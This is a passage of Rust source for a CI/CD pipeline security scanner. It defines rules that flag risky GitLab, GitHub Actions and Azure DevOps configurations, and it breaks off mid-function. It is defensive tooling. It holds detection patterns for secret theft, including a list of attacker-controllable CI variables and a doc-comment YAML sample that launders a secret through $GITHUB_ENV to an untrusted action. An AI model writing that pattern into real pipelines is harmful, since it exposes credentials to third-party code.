    CRED_FRAGMENTS.iter().any(|frag| pw_inner.contains(frag))
}
/// Rule: a CI script triggers a different project's pipeline via the GitLab
/// REST API using `CI_JOB_TOKEN` and forwards variables via the
/// `variables[KEY]=value` query/form parameter. Cross-project authority
/// bridge — the downstream project's security depends on the trust contract
/// between the two projects, and variable values flowing across that
/// boundary may originate from MR/fork context the attacker controls.
///
/// Severity: **Medium**. Higher-risk when the triggering job runs on MR
/// pipelines (`META_TRIGGER == "merge_request"`) — the message annotates
/// that case explicitly so operators see the elevated risk.
pub fn ci_token_triggers_downstream_with_variable_passthrough(
    graph: &AuthorityGraph,
) -> Vec<Finding> {
    let mr_triggered = graph
        .metadata
        .get(META_TRIGGER)
        .map(|t| t == "merge_request")
        .unwrap_or(false);
    // The MR annotation depends only on graph-level context, so it is
    // computed once, outside the step loop.
    let suffix = if mr_triggered {
        " (pipeline triggered on merge_request — variable values may originate from attacker-controlled MR context)"
    } else {
        ""
    };
    let mut findings = Vec::new();
    for step in graph.nodes_of_kind(NodeKind::Step) {
        let script = match step.metadata.get(META_SCRIPT_BODY) {
            Some(b) if !b.trim().is_empty() => b,
            _ => continue,
        };
        if !script_triggers_downstream_with_passthrough(script) {
            continue;
        }
        findings.push(Finding {
            severity: Severity::Medium,
            category: FindingCategory::CiTokenTriggersDownstreamWithVariablePassthrough,
            path: None,
            nodes_involved: vec![step.id],
            message: format!(
                "Step '{}' triggers a downstream pipeline via the GitLab REST API using CI_JOB_TOKEN and forwards variables[…] in the request — this is a cross-project authority channel that bypasses the parent-child trust model{}",
                step.name, suffix
            ),
            recommendation: Recommendation::Manual {
                action: "Constrain which variables the downstream pipeline accepts (use `variables.X.expand: false` and explicit allowlists), prefer pipeline triggers via `trigger:` keyword with `strategy: depend` over `curl … CI_JOB_TOKEN …`, and audit the receiving project's CI/CD settings to ensure it does not honour caller-supplied variables on protected refs.".into(),
            },
            source: FindingSource::BuiltIn,
            extras: FindingExtras::default(),
        });
    }
    findings
}
/// Returns true if `body` contains a `curl` (or wget) call that hits a
/// GitLab `/trigger/pipeline` endpoint with both `CI_JOB_TOKEN` and a
/// `variables[…]` field. We accept either query-string form
/// (`variables[X]=...`) or form-data form (`-F "variables[X]=..."`).
fn script_triggers_downstream_with_passthrough(body: &str) -> bool {
    let lower = body.to_lowercase();
    // All three signals must be present: a trigger endpoint, the job token,
    // and a `variables[` passthrough. The last check runs on the original
    // body (case-sensitive) — the API parameter name is lowercase.
    let hits_trigger_endpoint = lower.contains("trigger/pipeline")
        || (lower.contains("/api/v4/projects/") && lower.contains("/trigger"));
    hits_trigger_endpoint && lower.contains("ci_job_token") && body.contains("variables[")
}
/// Rule: a job emits an `artifacts.reports.dotenv: <file>` artifact whose
/// contents become pipeline variables for any consumer linked via `needs:`
/// or `dependencies:`. A consumer in a later stage that targets a
/// production-named environment inherits those variables transparently.
/// Producer-side risk amplifies when the script reads attacker-influenced
/// inputs (`CI_COMMIT_REF_NAME`, `CI_MERGE_REQUEST_SOURCE_BRANCH_NAME`,
/// `CI_COMMIT_TAG`, branch/commit derived strings).
///
/// Severity: **High** when a producer→consumer chain exists with a
/// production-like environment on the consumer; **Medium** when the chain
/// exists but no production environment is detected (still a covert
/// variable-promotion channel).
pub fn dotenv_artifact_flows_to_privileged_deployment(graph: &AuthorityGraph) -> Vec<Finding> {
    let mut findings = Vec::new();
    // Build (producer name -> producer step id, dotenv file) index.
    // NOTE(review): duplicate job names overwrite earlier entries — assumes
    // job names are unique within a pipeline.
    let mut producers: std::collections::HashMap<String, (NodeId, String)> =
        std::collections::HashMap::new();
    for step in graph.nodes_of_kind(NodeKind::Step) {
        if let Some(file) = step.metadata.get(META_DOTENV_FILE) {
            if let Some(job) = step.metadata.get(META_JOB_NAME) {
                producers.insert(job.clone(), (step.id, file.clone()));
            }
        }
    }
    if producers.is_empty() {
        return findings;
    }
    // Second pass: find consumers whose `needs:` list names a producer.
    for consumer in graph.nodes_of_kind(NodeKind::Step) {
        // META_NEEDS is a comma-separated list of upstream job names.
        let needs_csv = match consumer.metadata.get(META_NEEDS) {
            Some(s) if !s.is_empty() => s,
            _ => continue,
        };
        let upstream_jobs: Vec<&str> = needs_csv.split(',').filter(|s| !s.is_empty()).collect();
        let matched: Vec<&(NodeId, String)> = upstream_jobs
            .iter()
            .filter_map(|j| producers.get(*j))
            .collect();
        if matched.is_empty() {
            continue;
        }
        let env_name = consumer
            .metadata
            .get(META_ENVIRONMENT_NAME)
            .map(String::as_str)
            .unwrap_or("");
        // Production-like signal: explicit `environment.name:` value, OR
        // (fallback) the job name itself encodes a production marker.
        // GitLab pipelines often skip the explicit `environment:` block
        // and rely on stage/job naming conventions like `deploy-prod`.
        let consumer_job = consumer
            .metadata
            .get(META_JOB_NAME)
            .map(String::as_str)
            .unwrap_or(consumer.name.as_str());
        let production_like =
            is_production_environment(env_name) || is_production_environment(consumer_job);
        // Decide elevation: production-like consumer environment OR
        // producer script ingests attacker-influenced CI variables.
        let producer_uses_untrusted_input = matched.iter().any(|(pid, _)| {
            graph
                .node(*pid)
                .and_then(|n| n.metadata.get(META_SCRIPT_BODY))
                .map(|b| script_uses_attacker_influenced_ci_var(b))
                .unwrap_or(false)
        });
        if !production_like && !producer_uses_untrusted_input {
            continue; // benign dotenv flow — skip
        }
        // High only with a production-like consumer; untrusted producer
        // input alone stays Medium.
        let severity = if production_like {
            Severity::High
        } else {
            Severity::Medium
        };
        // Names of the upstream jobs that actually produce dotenv artifacts
        // (subset of `needs:`), for the message.
        let producer_names: Vec<String> = upstream_jobs
            .iter()
            .filter(|j| producers.contains_key(**j))
            .map(|s| (*s).to_string())
            .collect();
        let env_suffix = if production_like {
            if env_name.is_empty() {
                format!(" targeting production-like job name '{consumer_job}'")
            } else {
                format!(" targeting production-like environment '{env_name}'")
            }
        } else {
            String::new()
        };
        let trust_suffix = if producer_uses_untrusted_input {
            " (producer script reads attacker-influenced CI variables — branch/MR-source names propagate into the dotenv values)"
        } else {
            ""
        };
        // Consumer first, then every matched producer — `[sink, source...]`.
        let mut nodes_involved = vec![consumer.id];
        nodes_involved.extend(matched.iter().map(|(id, _)| *id));
        findings.push(Finding {
            severity,
            category: FindingCategory::DotenvArtifactFlowsToPrivilegedDeployment,
            path: None,
            nodes_involved,
            message: format!(
                "Step '{}' consumes a dotenv artifact from upstream job(s) [{}]{}{} — variables defined in the upstream's `artifacts.reports.dotenv` are silently promoted to the pipeline variable namespace, indistinguishable from pipeline-level variables in subsequent jobs",
                consumer.name,
                producer_names.join(", "),
                env_suffix,
                trust_suffix
            ),
            recommendation: Recommendation::Manual {
                action: "Treat dotenv outputs as untrusted: pin the producer to a protected branch/tag context only, validate variable values in the consumer before use, and prefer explicit `needs:[…].artifacts: false` plus pipeline-scoped variables for deployment selection. Never let dotenv-promoted values choose service connections, deploy targets, or registry destinations without an allowlist check.".into(),
            },
            source: FindingSource::BuiltIn,
            extras: FindingExtras::default(),
        });
    }
    findings
}
/// True when an environment name matches common production-like patterns.
///
/// A name is production-like when any `-` / `/`-separated segment equals one
/// of the tokens (`prod`, `production`, `prd`, `live`), e.g.
/// `production/eu-west-1`, `prod-cluster`, `eu-prod/cluster`. Segment
/// equality avoids substring false positives (`reproduce`, `delivery`,
/// `preprod`) while also matching mixed-separator names that the previous
/// prefix/suffix/infix checks missed (e.g. `eu-prod/cluster`).
fn is_production_environment(name: &str) -> bool {
    if name.is_empty() {
        return false;
    }
    let lower = name.to_lowercase();
    const TOKENS: &[&str] = &["prod", "production", "prd", "live"];
    // `_` is deliberately NOT a separator — `deploy_prod` did not match
    // before this change either; widening that is a policy call, not a fix.
    lower
        .split(|c| c == '/' || c == '-')
        .any(|segment| TOKENS.contains(&segment))
}
/// True when an inline script reads CI variables that carry attacker-controllable
/// content (branch names, MR source/target refs, tag refs, commit messages).
fn script_uses_attacker_influenced_ci_var(script: &str) -> bool {
    // Variables whose values an outside contributor can shape directly:
    // branch/tag names, commit messages and titles, MR titles/descriptions.
    const NEEDLES: &[&str] = &[
        "CI_COMMIT_REF_NAME",
        "CI_COMMIT_BRANCH",
        "CI_COMMIT_TAG",
        "CI_COMMIT_MESSAGE",
        "CI_COMMIT_TITLE",
        "CI_COMMIT_DESCRIPTION",
        "CI_MERGE_REQUEST_SOURCE_BRANCH_NAME",
        "CI_MERGE_REQUEST_TITLE",
        "CI_MERGE_REQUEST_DESCRIPTION",
    ];
    for needle in NEEDLES {
        if script.contains(needle) {
            return true;
        }
    }
    false
}
/// Rule: secret laundered through `$GITHUB_ENV` reaches an untrusted consumer
/// in the same job — composition gap between `self_mutating_pipeline` (the
/// gate-write detector) and `untrusted_with_authority` (the direct-access
/// detector).
///
/// **Pattern (R2 attack #3):**
/// ```yaml
/// jobs:
///   build:
///     steps:
///       - name: setup
///         run: echo "CLOUD_KEY=${{ secrets.CLOUD_KEY }}" >> $GITHUB_ENV   # writer
///       - uses: some-org/deploy@main                                      # untrusted
///         with:
///           key: ${{ env.CLOUD_KEY }}                                     # consumer
/// ```
/// The writer trips `self_mutating_pipeline`. The consumer never gets a
/// `HasAccessTo` edge to `CLOUD_KEY` (the value is sourced from the runner
/// env, not the secrets store) so neither `untrusted_with_authority` nor
/// `authority_propagation` fire — the env-gate launders the trust zone.
///
/// **Detection:** for every Step in the same job:
///   - Writer: `META_WRITES_ENV_GATE = "true"` AND has `HasAccessTo` to a
///     Secret/Identity (the value being laundered must derive from authority)
///   - Consumer: appears later in the job (NodeId order tracks declaration
///     order), trust zone is `Untrusted` or `ThirdParty`, and carries
///     `META_READS_ENV = "true"` (stamped by the parser when the step
///     references `${{ env.X }}` in `with:` / `run:`)
///
/// Same-job constraint enforced via `META_JOB_NAME` — the env gate only
/// propagates within a job, so cross-job pairs are not flagged.
pub fn secret_via_env_gate_to_untrusted_consumer(graph: &AuthorityGraph) -> Vec<Finding> {
    let mut findings = Vec::new();
    // Step 1: enumerate writer-with-secret nodes, paired with the laundered
    // authority names so the finding message can name them. We capture the
    // node id in declaration order so the same-job ordering check below is a
    // simple comparison rather than an O(n²) scan.
    // Borrowed views into the graph; lives only for the duration of this call.
    struct Writer<'a> {
        id: NodeId,
        job: &'a str,
        name: &'a str,
        secrets: Vec<&'a str>,
    }
    let writers: Vec<Writer<'_>> = graph
        .nodes_of_kind(NodeKind::Step)
        .filter(|step| {
            step.metadata
                .get(META_WRITES_ENV_GATE)
                .map(|v| v == "true")
                .unwrap_or(false)
        })
        .filter_map(|step| {
            // Steps without a job name cannot satisfy the same-job
            // constraint, so they are dropped here.
            let job = step.metadata.get(META_JOB_NAME)?.as_str();
            // Must hold authority — collect Secret/Identity names reachable
            // via HasAccessTo. An env-gate write that doesn't carry any
            // authority is the harmless "ECHO ROUTE=/api >> $GITHUB_ENV"
            // case; not in scope for this rule.
            let secrets: Vec<&str> = graph
                .edges_from(step.id)
                .filter(|e| e.kind == EdgeKind::HasAccessTo)
                .filter_map(|e| graph.node(e.to))
                .filter(|n| matches!(n.kind, NodeKind::Secret | NodeKind::Identity))
                .map(|n| n.name.as_str())
                .collect();
            if secrets.is_empty() {
                return None;
            }
            Some(Writer {
                id: step.id,
                job,
                name: step.name.as_str(),
                secrets,
            })
        })
        .collect();
    if writers.is_empty() {
        return findings;
    }
    // Step 2: for every consumer step that reads env, find the writer(s) it
    // could be laundering from.
    for consumer in graph.nodes_of_kind(NodeKind::Step) {
        // Consumer must read the runner env.
        let reads_env = consumer
            .metadata
            .get(META_READS_ENV)
            .map(|v| v == "true")
            .unwrap_or(false);
        if !reads_env {
            continue;
        }
        // Consumer must run with reduced trust — first-party readers are
        // already accounted for elsewhere and would be a high-FP class.
        if !matches!(
            consumer.trust_zone,
            TrustZone::Untrusted | TrustZone::ThirdParty
        ) {
            continue;
        }
        let consumer_job = match consumer.metadata.get(META_JOB_NAME) {
            Some(j) => j.as_str(),
            None => continue,
        };
        // Find writers in the same job that appear earlier (NodeId order
        // mirrors declaration order — see GHA parser, ADO parser).
        let upstream: Vec<&Writer<'_>> = writers
            .iter()
            .filter(|w| w.job == consumer_job && w.id < consumer.id)
            .collect();
        if upstream.is_empty() {
            continue;
        }
        // Aggregate the laundered authority names across all writers so
        // operators see the full set of credentials potentially reaching
        // the untrusted step. Stable ordering, dedup'd.
        let mut secret_labels: Vec<&str> = upstream
            .iter()
            .flat_map(|w| w.secrets.iter().copied())
            .collect();
        secret_labels.sort_unstable();
        secret_labels.dedup();
        let writer_names: Vec<&str> = upstream.iter().map(|w| w.name).collect();
        // `nodes_involved` order: consumer, then writers, then credentials.
        let mut nodes_involved = vec![consumer.id];
        nodes_involved.extend(upstream.iter().map(|w| w.id));
        // Include the laundered Secret/Identity nodes themselves so the
        // fingerprint and downstream consumers can attribute the finding
        // to a specific credential.
        for w in &upstream {
            for e in graph.edges_from(w.id) {
                if e.kind == EdgeKind::HasAccessTo
                    && graph
                        .node(e.to)
                        .map(|n| matches!(n.kind, NodeKind::Secret | NodeKind::Identity))
                        .unwrap_or(false)
                    && !nodes_involved.contains(&e.to)
                {
                    nodes_involved.push(e.to);
                }
            }
        }
        findings.push(Finding {
            severity: Severity::Critical,
            category: FindingCategory::SecretViaEnvGateToUntrustedConsumer,
            path: None,
            nodes_involved,
            message: format!(
                "Untrusted consumer '{}' in job '{}' reads from $GITHUB_ENV after step(s) [{}] laundered authority [{}] through the env gate — secret reaches untrusted code without ever appearing in a HasAccessTo edge",
                consumer.name,
                consumer_job,
                writer_names.join(", "),
                secret_labels.join(", "),
            ),
            recommendation: Recommendation::Manual {
                action: "Pass the secret to the consuming step via an explicit `env:` mapping on that step (so the relationship is graph-visible) instead of writing it to `$GITHUB_ENV` for ambient pickup. If the consumer is a third-party action, pin it to a 40-char SHA before exposing any secret-derived value to it.".into(),
            },
            source: FindingSource::BuiltIn,
            extras: FindingExtras::default(),
        });
    }
    findings
}
// ── Positive invariants (negative-space rules) ───────────────────
//
// These rules fire on the ABSENCE of an expected defensive control rather
// than on the presence of a misconfigured one. They are derived from the
// blue-team corpus defense report — patterns observed across thousands of
// pipelines where the well-defended workflows had a control the others were
// missing.
//
// Each function gates strictly on `META_PLATFORM` so a single pipeline file
// is only evaluated by the rules that apply to its source platform.
/// Returns true when a graph belongs to the named platform. Falls back to
/// false (rule no-ops) when no platform stamp is present — keeps existing
/// hand-built test graphs from accidentally tripping platform-scoped rules.
fn graph_is_platform(graph: &AuthorityGraph, platform: &str) -> bool {
    // An absent platform stamp means "not this platform": keeps the
    // platform-scoped rules quiet on hand-built test graphs that never
    // set META_PLATFORM.
    matches!(graph.metadata.get(META_PLATFORM), Some(p) if p == platform)
}
/// Rule: GHA workflow declares no top-level `permissions:` block AND no
/// per-job permissions block. With nothing declared, `GITHUB_TOKEN` falls
/// back to the broad platform default (`contents: write`, `packages: write`,
/// metadata read, etc.) on every trigger. Explicit declarations make the
/// blast radius legible to the next reviewer; absence makes it invisible.
///
/// Detection:
/// * `META_PLATFORM == "github-actions"` (gates ADO/GitLab out)
/// * Graph carries `META_NO_WORKFLOW_PERMISSIONS == "true"` (parser-set
/// when `workflow.permissions` is absent)
/// * No Identity node whose name starts with `GITHUB_TOKEN (` (those are
/// the per-job override identities the parser creates when a job
/// declares its own permissions block)
///
/// Severity: Medium. Not a direct exploit path on its own but compounds
/// every other finding in the same workflow.
pub fn no_workflow_level_permissions_block(graph: &AuthorityGraph) -> Vec<Finding> {
    // Platform gate: this rule is GitHub-Actions-specific.
    if !graph_is_platform(graph, "github-actions") {
        return Vec::new();
    }
    // The parser stamps this key when `workflow.permissions` is absent.
    let missing_top_level = matches!(
        graph.metadata.get(META_NO_WORKFLOW_PERMISSIONS),
        Some(v) if v == "true"
    );
    if !missing_top_level {
        return Vec::new();
    }
    // A graph with no Step nodes (variable-only YAML mis-detected as GHA,
    // parse failures that left the graph empty, etc.) has no real
    // authority surface to be over-broad over — skip it. Any real
    // workflow produces at least one Step node.
    if graph.nodes_of_kind(NodeKind::Step).next().is_none() {
        return Vec::new();
    }
    // Job-scoped permissions blocks materialise as Identity nodes named
    // `GITHUB_TOKEN (<job_name>)` (or a bare GITHUB_TOKEN carrying an
    // explicit permissions entry). Any such node means the workflow
    // declared *something* — don't fire.
    let job_override_exists = graph.nodes_of_kind(NodeKind::Identity).any(|id| {
        id.name.starts_with("GITHUB_TOKEN (")
            || (id.name == "GITHUB_TOKEN" && id.metadata.contains_key(META_PERMISSIONS))
    });
    if job_override_exists {
        return Vec::new();
    }
    vec![Finding {
        severity: Severity::Medium,
        category: FindingCategory::NoWorkflowLevelPermissionsBlock,
        path: None,
        nodes_involved: Vec::new(),
        message: "Workflow declares no top-level or per-job `permissions:` block — GITHUB_TOKEN \
                  falls back to the broad platform default (contents: write, packages: write, …) \
                  on every trigger. Explicit permissions make the blast radius legible to triage."
            .into(),
        recommendation: Recommendation::ReducePermissions {
            current: "platform default (broad)".into(),
            minimum: "permissions: {} at top level, then add the minimum per-job — e.g. \
                      `permissions: { contents: read }`"
                .into(),
        },
        source: FindingSource::BuiltIn,
        extras: FindingExtras::default(),
    }]
}
/// Rule: ADO job referencing a production-named service connection has no
/// `environment:` binding. Strictly broader than
/// `terraform_auto_approve_in_prod` — fires on any prod-SC step (Terraform,
/// ARM, AzureCLI, AzurePowerShell, custom) whose enclosing job lacks the
/// approval gate, regardless of whether `-auto-approve` is set.
///
/// Detection (per Step):
/// * `META_PLATFORM == "azure-devops"`
/// * Step carries `META_SERVICE_CONNECTION_NAME` matching prod pattern,
/// OR an `Identity` connected via `HasAccessTo` whose name matches
/// the same pattern AND carries `META_SERVICE_CONNECTION == "true"`.
/// * Step does NOT carry `META_ENV_APPROVAL` (parser tags every step
/// inside an environment-bound deployment job).
///
/// One finding per matching step (matching `terraform_auto_approve_in_prod`
/// granularity). Severity: High.
/// See the doc comment above: fires on any step targeting a
/// production-named ADO service connection whose enclosing job lacks an
/// `environment:` binding. One finding per matching step.
pub fn prod_deploy_job_no_environment_gate(graph: &AuthorityGraph) -> Vec<Finding> {
    if !graph_is_platform(graph, "azure-devops") {
        return Vec::new();
    }
    let mut findings = Vec::new();
    for step in graph.nodes_of_kind(NodeKind::Step) {
        // Steps inside an environment-bound deployment job are already
        // gated — the parser tags every such step with META_ENV_APPROVAL.
        let env_gated = step
            .metadata
            .get(META_ENV_APPROVAL)
            .map(|v| v == "true")
            .unwrap_or(false);
        if env_gated {
            continue;
        }
        // Resolve the service-connection name: prefer the step's own
        // metadata; only walk HasAccessTo edges when that is absent.
        // (`or_else` keeps the edge scan lazy — the previous `.or(...)`
        // computed the edge lookup eagerly for every step.)
        let connection = step
            .metadata
            .get(META_SERVICE_CONNECTION_NAME)
            .cloned()
            .or_else(|| {
                graph
                    .edges_from(step.id)
                    .filter(|e| e.kind == EdgeKind::HasAccessTo)
                    .filter_map(|e| graph.node(e.to))
                    .find(|n| {
                        n.kind == NodeKind::Identity
                            && n.metadata
                                .get(META_SERVICE_CONNECTION)
                                .map(|v| v == "true")
                                .unwrap_or(false)
                    })
                    .map(|n| n.name.clone())
            });
        // Only production-looking connection names are in scope.
        let conn_name = match connection {
            Some(n) if looks_like_prod_connection(&n) => n,
            _ => continue,
        };
        findings.push(Finding {
            severity: Severity::High,
            category: FindingCategory::ProdDeployJobNoEnvironmentGate,
            path: None,
            nodes_involved: vec![step.id],
            message: format!(
                "Step '{}' targets production service connection '{}' but its job has no \
                 `environment:` binding — every pipeline trigger applies changes with no \
                 approval queue and no entry in the ADO Environments audit trail",
                step.name, conn_name
            ),
            recommendation: Recommendation::Manual {
                action: "Move the step into a deployment job whose `environment:` is configured \
                         with required approvers in ADO. Even if `-auto-approve` is acceptable \
                         (e.g. `terraform apply tfplan`), the environment binding gives the \
                         platform a chokepoint for approvals, audit, and concurrency limits."
                    .into(),
            },
            source: FindingSource::BuiltIn,
            extras: FindingExtras::default(),
        });
    }
    findings
}
/// Rule: long-lived static credential in scope but the graph has no OIDC
/// identity. Advisory uplift on top of `long_lived_credential` that wires
/// the existing `Recommendation::FederateIdentity` variant — emits one Info
/// finding per static credential whose name suggests a cloud provider that
/// supports OIDC (AWS / GCP / Azure).
///
/// Heuristic: AWS / GCP / Azure tokens usually carry the provider name in
/// the variable identifier (`AWS_*`, `GCP_*`, `GCLOUD_*`, `GOOGLE_*`,
/// `AZURE_*`, `ARM_*`). When such a name appears AND no OIDC identity
/// exists in the graph, the migration to federation is the actionable
/// remediation. The recommendation enum has carried `FederateIdentity` for
/// two releases without any rule emitting it.
///
/// Severity: Info (advisory). The underlying credential is already flagged
/// at higher severity by `long_lived_credential`.
pub fn long_lived_secret_without_oidc_recommendation(graph: &AuthorityGraph) -> Vec<Finding> {
    // Any OIDC identity present → the workflow is already on a federated
    // path; a static credential alongside it is presumably a legacy
    // artifact unrelated to the OIDC integration — out of scope here.
    let already_federated = graph
        .nodes_of_kind(NodeKind::Identity)
        .any(|n| matches!(n.metadata.get(META_OIDC), Some(v) if v == "true"));
    if already_federated {
        return Vec::new();
    }
    // Map a secret name to (cloud label, federation recipe) when it looks
    // like a static credential for an OIDC-capable provider.
    let classify = |name: &str| -> Option<(&'static str, &'static str)> {
        let upper = name.to_uppercase();
        if upper.starts_with("AWS_")
            || upper.contains("AWS_ACCESS_KEY")
            || upper.contains("AWS_SECRET")
        {
            return Some(("AWS", "GitHub Actions OIDC + sts:AssumeRoleWithWebIdentity (id-token: write + aws-actions/configure-aws-credentials)"));
        }
        if upper.starts_with("GCP_")
            || upper.starts_with("GCLOUD_")
            || upper.starts_with("GOOGLE_")
            || upper.contains("GCP_SERVICE_ACCOUNT")
            || upper.contains("GOOGLE_CREDENTIALS")
        {
            return Some(("GCP", "GCP Workload Identity Federation (google-github-actions/auth with workload_identity_provider)"));
        }
        if upper.starts_with("AZURE_")
            || upper.starts_with("ARM_")
            || upper.contains("AZURE_CLIENT_SECRET")
        {
            return Some((
                "Azure",
                "Azure federated credential (azure/login with client-id, no client-secret)",
            ));
        }
        None
    };
    graph
        .nodes_of_kind(NodeKind::Secret)
        .filter_map(|secret| {
            let (cloud, oidc_provider) = classify(&secret.name)?;
            Some(Finding {
                severity: Severity::Info,
                category: FindingCategory::LongLivedSecretWithoutOidcRecommendation,
                path: None,
                nodes_involved: vec![secret.id],
                message: format!(
                    "Long-lived {cloud} credential '{}' is in scope and no OIDC identity exists \
                     in this workflow — {cloud} supports OIDC federation, so this credential could \
                     be replaced with a short-lived token issued at runtime",
                    secret.name
                ),
                recommendation: Recommendation::FederateIdentity {
                    static_secret: secret.name.clone(),
                    oidc_provider: oidc_provider.into(),
                },
                source: FindingSource::BuiltIn,
                extras: FindingExtras::default(),
            })
        })
        .collect()
}
/// Rule: GHA workflow with multiple privileged jobs where SOME steps carry
/// the standard fork-check `if:` and OTHERS do not — intra-file
/// inconsistency in defensive posture. The org has the right instinct
/// (some jobs are guarded) but applied it unevenly. Surfaces the unguarded
/// privileged jobs by name so a reviewer can fix the gap in one PR.
///
/// Detection:
/// * `META_PLATFORM == "github-actions"`
/// * Trigger contains `pull_request` or `pull_request_target`
/// * Multiple jobs hold authority (steps with `HasAccessTo` to a Secret
/// or Identity)
/// * At least one such job's privileged steps ALL carry
/// `META_FORK_CHECK == "true"`
/// * AND at least one OTHER privileged job has NO step carrying that
/// marker
///
/// Severity: High. Severity floors at Medium when the inconsistency is
/// limited to a single unguarded job (one-off oversight) vs. multiple
/// (systemic gap).
pub fn pull_request_workflow_inconsistent_fork_check(graph: &AuthorityGraph) -> Vec<Finding> {
    if !graph_is_platform(graph, "github-actions") {
        return Vec::new();
    }
    let trigger = match graph.metadata.get(META_TRIGGER) {
        None => return Vec::new(),
        Some(t) => t.as_str(),
    };
    // Only PR-shaped triggers can deliver fork-controlled code.
    let pr_triggered = trigger
        .split(',')
        .map(str::trim)
        .any(|t| matches!(t, "pull_request" | "pull_request_target"));
    if !pr_triggered {
        return Vec::new();
    }
    use std::collections::BTreeMap;
    // job -> (saw a guarded privileged step, saw an unguarded one). A job
    // is "fully guarded" iff the second flag never flips.
    let mut guard_state: BTreeMap<String, (bool, bool)> = BTreeMap::new();
    for step in graph.nodes_of_kind(NodeKind::Step) {
        // Privileged = holds a HasAccessTo edge into a Secret/Identity.
        let privileged = graph.edges_from(step.id).any(|e| {
            e.kind == EdgeKind::HasAccessTo
                && graph
                    .node(e.to)
                    .map(|n| matches!(n.kind, NodeKind::Secret | NodeKind::Identity))
                    .unwrap_or(false)
        });
        if !privileged {
            continue;
        }
        // Fall back to the step name when the parser attached no job name.
        let job = step
            .metadata
            .get(META_JOB_NAME)
            .cloned()
            .unwrap_or_else(|| step.name.clone());
        let has_check = step
            .metadata
            .get(META_FORK_CHECK)
            .map(|v| v == "true")
            .unwrap_or(false);
        let slot = guard_state.entry(job).or_insert((false, false));
        if has_check {
            slot.0 = true;
        } else {
            slot.1 = true;
        }
    }
    // Inconsistency needs >= 2 distinct privileged jobs, >= 1 fully
    // guarded and >= 1 with at least one unguarded privileged step.
    if guard_state.len() < 2 {
        return Vec::new();
    }
    let fully_guarded: Vec<&String> = guard_state
        .iter()
        .filter(|(_, (guarded, unguarded))| *guarded && !*unguarded)
        .map(|(job, _)| job)
        .collect();
    let unguarded: Vec<&String> = guard_state
        .iter()
        .filter(|(_, (_, unguarded))| *unguarded)
        .map(|(job, _)| job)
        .collect();
    if fully_guarded.is_empty() || unguarded.is_empty() {
        return Vec::new();
    }
    // One unguarded job reads as a one-off oversight; several as a
    // systemic gap.
    let severity = if unguarded.len() < 2 {
        Severity::Medium
    } else {
        Severity::High
    };
    let guarded_label = fully_guarded
        .iter()
        .map(|s| s.as_str())
        .collect::<Vec<_>>()
        .join(", ");
    let unguarded_label = unguarded
        .iter()
        .map(|s| s.as_str())
        .collect::<Vec<_>>()
        .join(", ");
    vec![Finding {
        severity,
        category: FindingCategory::PullRequestWorkflowInconsistentForkCheck,
        path: None,
        nodes_involved: Vec::new(),
        message: format!(
            "PR-triggered workflow ('{trigger}') applies the standard fork-check \
             (`github.event.pull_request.head.repo.fork == false` or equivalent) on \
             privileged jobs [{guarded_label}] but NOT on [{unguarded_label}] — the \
             unguarded jobs hold authority that fork PRs can reach"
        ),
        recommendation: Recommendation::Manual {
            action: format!(
                "Add `if: github.event.pull_request.head.repo.fork == false` (or \
                 `github.event.pull_request.head.repo.full_name == github.repository`) to the \
                 privileged steps in [{unguarded_label}]. Match the pattern already used by \
                 [{guarded_label}] in the same workflow."
            ),
        },
        source: FindingSource::BuiltIn,
        extras: FindingExtras::default(),
    }]
}
/// Rule: GitLab job with a production-named `environment:` binding has no
/// `rules:` / `only:` clause restricting it to protected branches. The job
/// runs (or attempts to run) on every pipeline trigger; if branch
/// protection is later relaxed the deploy becomes runnable from
/// unprotected branches without any code change.
///
/// Detection (per Step in a GitLab graph):
/// * `META_PLATFORM == "gitlab"`
/// * Step carries `environment_name` matching a production token
/// (`prod`, `production`, `prd`)
/// * Step does NOT carry `META_RULES_PROTECTED_ONLY`
///
/// Severity: Medium.
pub fn gitlab_deploy_job_missing_protected_branch_only(graph: &AuthorityGraph) -> Vec<Finding> {
    if !graph_is_platform(graph, "gitlab") {
        return Vec::new();
    }
    graph
        .nodes_of_kind(NodeKind::Step)
        .filter_map(|step| {
            // Must target a production-looking environment.
            let env_name = step.metadata.get("environment_name")?.clone();
            if !looks_like_prod_connection(&env_name) {
                return None;
            }
            // Already restricted to protected branches — nothing to flag.
            let protected_only = matches!(
                step.metadata.get(META_RULES_PROTECTED_ONLY),
                Some(v) if v == "true"
            );
            if protected_only {
                return None;
            }
            Some(Finding {
                severity: Severity::Medium,
                category: FindingCategory::GitlabDeployJobMissingProtectedBranchOnly,
                path: None,
                nodes_involved: vec![step.id],
                message: format!(
                    "GitLab deploy job '{}' targets production environment '{}' but has no \
                     `rules:` / `only:` clause restricting it to protected branches — every MR \
                     and every push will attempt to run the deploy",
                    step.name, env_name
                ),
                recommendation: Recommendation::Manual {
                    action: "Add `rules: - if: '$CI_COMMIT_REF_PROTECTED == \"true\"'` to the job, \
                             or `only: [main]` for the simplest case. This survives future \
                             changes to branch-protection settings."
                        .into(),
                },
                source: FindingSource::BuiltIn,
                extras: FindingExtras::default(),
            })
        })
        .collect()
}
// ── Compensating-control suppressions ────────────────────────
//
// These suppressions DOWNGRADE or REMOVE existing-rule findings when the
// graph carries a control that neutralises (or substantially mitigates)
// the underlying risk. Applied as a post-processing pass so each
// suppression can see both the finding and the surrounding graph state.
//
// Design intent (from the blue-team corpus defense report):
// * downgrade > suppress: keep the finding visible at a lower severity
// so it still surfaces in audits, but stop competing for triage time
// with un-mitigated criticals
// * never *delete* a finding silently — every suppression appends an
// explanation suffix to the message describing the compensating
// control that was credited
//
// Suppressions implemented here:
// 1. `checkout_self_pr_exposure` downgraded when the same job has no
// privileged steps (no Secret/Identity access and no env-gate writes).
// 2. `trigger_context_mismatch` downgraded when every privileged step
// in the workflow carries the standard fork-check `if:`.
// 3. `over_privileged_identity` suppressed when the workflow-level
// identity is broad but at least one job-level override narrows the
// scope (job-level wins at runtime).
// 4. `terraform_auto_approve_in_prod` downgraded — not skipped — when an
// `environment:` gate is present (replaces the previous early-skip
// which discarded the finding entirely).
fn apply_compensating_controls(graph: &AuthorityGraph, findings: &mut [Finding]) {
// Pre-compute graph-level signals once so the per-finding loop stays
// O(N findings) rather than O(N findings × M nodes).
let mut all_authority_steps_have_fork_check = true;
let mut any_authority_step_seen = false;
for step in graph.nodes_of_kind(NodeKind::Step) {
let holds_authority = graph.edges_from(step.id).any(|e| {
e.kind == EdgeKind::HasAccessTo
&& graph
.node(e.to)
.map(|n| matches!(n.kind, NodeKind::Secret | NodeKind::Identity))
.unwrap_or(false)
});
if !holds_authority {
continue;
}
